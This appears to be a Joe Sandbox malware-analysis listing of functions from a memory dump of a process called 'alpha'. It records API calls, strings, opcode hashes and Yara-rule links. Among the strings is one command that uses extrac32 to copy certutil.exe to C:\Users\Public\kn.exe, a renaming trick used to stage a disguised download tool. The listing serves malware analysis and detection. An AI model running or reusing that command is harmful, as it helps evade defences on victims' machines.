GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0 ref: 00007FF7823D7064

Strings

%s %s , xrefs: 00007FF7823F4400
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF7823D6EEB
%s , xrefs: 00007FF7823F43ED
%02d%s%02d%s%02d, xrefs: 00007FF7823F4355

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
API String ID: 1795611712-3662956551
Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
Instruction ID: bbf9fc2481c6f7c57a0c38481fac415da04ac7f831b11a4c864cd4431ac825c4
Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
Instruction Fuzzy Hash: 34E1E461E0860291EB50AB65B8641FDE7A0FF44786FF0417ADA0E53A95DFBCE948C330

Function 00007FF7823FEE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

_wcsupr.MSVCRT ref: 00007FF7823FEF33
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FEF98
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FEFA9
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FEFBF
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823FEFDC
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FEFED
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF003
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF022
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF083
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF092
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF0A5
towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7823FF0DB
wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF135
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF16C
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823FF185

Part of subcall function 00007FF7823E01B8: _get_osfhandle.MSVCRT ref: 00007FF7823E01C4
Part of subcall function 00007FF7823E01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E01D6

Strings

CMD.EXE, xrefs: 00007FF7823FF19D
<noalias>, xrefs: 00007FF7823FF03C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
String ID: <noalias>$CMD.EXE
API String ID: 1161012917-1690691951
Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
Instruction ID: 253676cc49d2c9babcd89e64f2ba9a17e29f725fe26a57773f57ce8ce22f4cec
Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
Instruction Fuzzy Hash: 9D91A322B086428AFF44BB61E4201BDBAA0BF45B56FE54179DD0E17AD5DFBCA845C330

Function 00007FF7823D32B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602

_get_osfhandle.MSVCRT ref: 00007FF7823D32F3
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7823D32A4), ref: 00007FF7823D3309
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823D3384
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F11DF

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
String ID:
API String ID: 611521582-0
Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
Instruction ID: 1f96b0be1bc0fbc65c5172fdcf53d680209f55bea0d52b595a5e916599b7f084
Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
Instruction Fuzzy Hash: 12A1A522B0861286FB14AB62A4142BDFBA1FB89756FA45039CD0E47B50DFBCE845C620

Function 00007FF7823D1560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D15BD

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D1620
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D1638
FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D16C0

Part of subcall function 00007FF7823D1560: FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D17F0
Part of subcall function 00007FF7823D1560: FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D180C
Part of subcall function 00007FF7823D1560: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D183E

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823EAC35
SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EAC68

Strings

\\?\, xrefs: 00007FF7823EAC99

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
String ID: \\?\
API String ID: 628682198-4282027825
Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
Instruction ID: 9c56e1c57cdc527f6e395b9d0bbd6a9f5c4e8dead4f74706cb01d93fc2b76a9c
Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
Instruction Fuzzy Hash: 5DE1D526B0878296EF61AF20D8643F9A7A0FB4474AFA04179DA4E47BD4DF7CE545C320

Function 00007FF7823FAFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON

Download Yara Rule

APIs

longjmp.MSVCRT(?,?,?,?,00007FF7823F182A), ref: 00007FF7823FAFD8
_setjmp.MSVCRT ref: 00007FF7823FB032

Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C

memset.MSVCRT ref: 00007FF7823FB126
memset.MSVCRT ref: 00007FF7823FB14C
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FB266
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FB281

Part of subcall function 00007FF7823FAFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FB717
Part of subcall function 00007FF7823FAFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FB736
Part of subcall function 00007FF7823FAFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FB755

Part of subcall function 00007FF7823E3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823FEAC5,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823E3A56

Part of subcall function 00007FF7823FAFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FB7D2
Part of subcall function 00007FF7823FAFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FB7F1
Part of subcall function 00007FF7823FAFBC: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FB810

wcschr.MSVCRT ref: 00007FF7823FB2AA
memset.MSVCRT ref: 00007FF7823FB2E0

Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3

wcsrchr.MSVCRT ref: 00007FF7823FB4BC
MoveFileWithProgressW.API-MS-WIN-CORE-FILE-L2-1-0 ref: 00007FF7823FB692
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FB6A2

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
String ID:
API String ID: 16309207-0
Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
Instruction ID: c82e7cb4c0b43138254a2e394279048f95187c7d60ef0fef2af6a43692c14997
Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
Instruction Fuzzy Hash: 6422E462704B8296EF64AF20E8642F9B7A1FF48786FA04179DA0E07B95DFBCD545C310

Function 00007FF7823DCE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

_tell.MSVCRT ref: 00007FF7823DCEAF
memset.MSVCRT ref: 00007FF7823DCF5C
_wcsicmp.MSVCRT ref: 00007FF7823DCFAE
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823DD003
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823DD01E
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823DD044
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823EC889
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823EC8A2

Strings

GOTO, xrefs: 00007FF7823DD0A3
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7823EC9F1

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
API String ID: 3863671652-4137775220
Opcode ID: b52512778d22154e6a2ef45f8ba4ccb715e673a687fadbad016111a197e875a1
Instruction ID: b41e95134c408b5fea2ccd10206b3e9be2ff45cbe1350f38255ea72f994e4182
Opcode Fuzzy Hash: b52512778d22154e6a2ef45f8ba4ccb715e673a687fadbad016111a197e875a1
Instruction Fuzzy Hash: C4E1C066A0924291FAA0BB15E4683B8F6A0BF89742FF44479DD1D03AD1DFBCE845C330

Function 00007FF7823D3410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823D3477
wcschr.MSVCRT ref: 00007FF7823D34A0
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823D34DF
_ultoa.MSVCRT ref: 00007FF7823F12DA
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823F12E6
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823F131E

Strings

System, xrefs: 00007FF7823F133A
, xrefs: 00007FF7823F12FB
Application, xrefs: 00007FF7823F1341

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
String ID: $Application$System
API String ID: 3538039442-1881496484
Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
Instruction ID: 32098c014e345cc6cc3d9bbb17c95a8a9f933a78b55aa1ecc746a82d7de45fe2
Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
Instruction Fuzzy Hash: C251D332B08B4193EB619B15F41467AFAA1FB89B46F948138DE4E03B54DF7CE845CB20

Function 00007FF7823FD9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON

Download Yara Rule

APIs

longjmp.MSVCRT(?,?,00000000,00007FF7823F048E), ref: 00007FF7823FDA58
memset.MSVCRT ref: 00007FF7823FDAD6
memset.MSVCRT ref: 00007FF7823FDAFC
memset.MSVCRT ref: 00007FF7823FDB22

Part of subcall function 00007FF7823E3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823FEAC5,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823E3A56

Part of subcall function 00007FF7823D5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823D51C4

Part of subcall function 00007FF7823E823C: FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
Part of subcall function 00007FF7823E823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D

Part of subcall function 00007FF7823E01B8: _get_osfhandle.MSVCRT ref: 00007FF7823E01C4
Part of subcall function 00007FF7823E01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E01D6

Part of subcall function 00007FF7823D4FE8: _get_osfhandle.MSVCRT ref: 00007FF7823D5012
Part of subcall function 00007FF7823D4FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D5030

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FDDB0

Part of subcall function 00007FF7823D59E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D5A2E
Part of subcall function 00007FF7823D59E4: _open_osfhandle.MSVCRT ref: 00007FF7823D5A4F

_get_osfhandle.MSVCRT ref: 00007FF7823FDDEB
SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FDDFA
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FE204
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FE223
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FE242

Strings

~, xrefs: 00007FF7823FDB34
%9d, xrefs: 00007FF7823FD9EF
%s, xrefs: 00007FF7823FDC95, 00007FF7823FE00C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
String ID: %9d$%s$~
API String ID: 3651208239-912394897
Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
Instruction ID: 372b35b016aa01b3802fb0b5f010befd46f02f981e17c8e8f4bfc376b16fae4d
Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
Instruction Fuzzy Hash: 4442D732A0868286EB64BF21E8642FDB3A0FB85746FE00079D64D47E99DFBCD545C720

Function 00007FF7823D372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D3921

Part of subcall function 00007FF7823E09F4: iswspace.MSVCRT ref: 00007FF7823E0A11
Part of subcall function 00007FF7823E09F4: wcschr.MSVCRT ref: 00007FF7823E0A2B

wcsrchr.MSVCRT ref: 00007FF7823D37D2
_wcsnicmp.MSVCRT ref: 00007FF7823D381A
wcsrchr.MSVCRT ref: 00007FF7823D3A0C
wcsrchr.MSVCRT ref: 00007FF7823D3A35
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D3A9D
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D3ACC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D3AE1
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D3B1E

Strings

COPYCMD, xrefs: 00007FF7823D37AE
\, xrefs: 00007FF7823D3AB9

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
String ID: COPYCMD$\
API String ID: 3989487059-1802776761
Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
Instruction ID: 0be6c8a049f1a91011ad49935cf0f2b3526e5bd633ce7819a7ba7eddc132b3a9
Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
Instruction Fuzzy Hash: 27F1D665B0874681FF50BB15E4242BAE7A0FF45B89FA44079CE4E47B94DEBCE845C710

Function 00007FF7823E3140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON

Download Yara Rule

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF7823E3189
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0 ref: 00007FF7823E319F
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E31B5
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0 ref: 00007FF7823E31CB
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823EE619
GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0 ref: 00007FF7823EE738

Strings

.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF7823E3147
, xrefs: 00007FF7823EE718
%2d%s%02d%s%02d%s%02d, xrefs: 00007FF7823E3236, 00007FF7823EE5C9
HH:mm:ss t, xrefs: 00007FF7823EE629
%02d%s%02d%s, xrefs: 00007FF7823EE799

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Time$File$System$FormatInfoLocalLocale
